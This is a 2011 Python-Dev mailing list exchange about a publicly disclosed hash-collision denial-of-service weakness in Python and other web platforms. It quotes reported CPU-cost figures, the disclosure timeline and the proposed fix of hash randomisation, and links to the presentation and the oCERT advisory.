On Wednesday, December 28, 2011 at 8:28 PM, Michael Foord wrote:
> Hello all, > > A paper (well, presentation) has been published highlighting security > problems with the hashing algorithm (exploiting collisions) in many > programming languages Python included: > > http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf > > Although it's a security issue I'm posting it here because it is now public > and seems important. > > The issue they report can cause (for example) handling an http post to > consume horrible amounts of cpu. For Python the figures they quoted: > > reasonable-sized attack strings only for 32 bits Plone has max. POST size of > 1 MB > 7 minutes of CPU usage for a 1 MB request > ~20 kbits/s → keep one Core Duo core busy > > This was apparently reported to the security list, but hasn't been responded > to beyond an acknowledgement on November 24th (the original report didn't > make it onto the security list because it was held in a moderation queue). > > The same vulnerability was reported against various languages and web > frameworks, and is already fixed in some of them. > > Their recommended fix is to randomize the hash function. > > All the best, > > Michael > Back up link for the PDF: http://dl.dropbox.com/u/1374/2007_28C3_Effective_DoS_on_web_application_platforms.pdf Ocert disclosure: http://www.ocert.org/advisories/ocert-2011-003.html jesse _______________________________________________ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
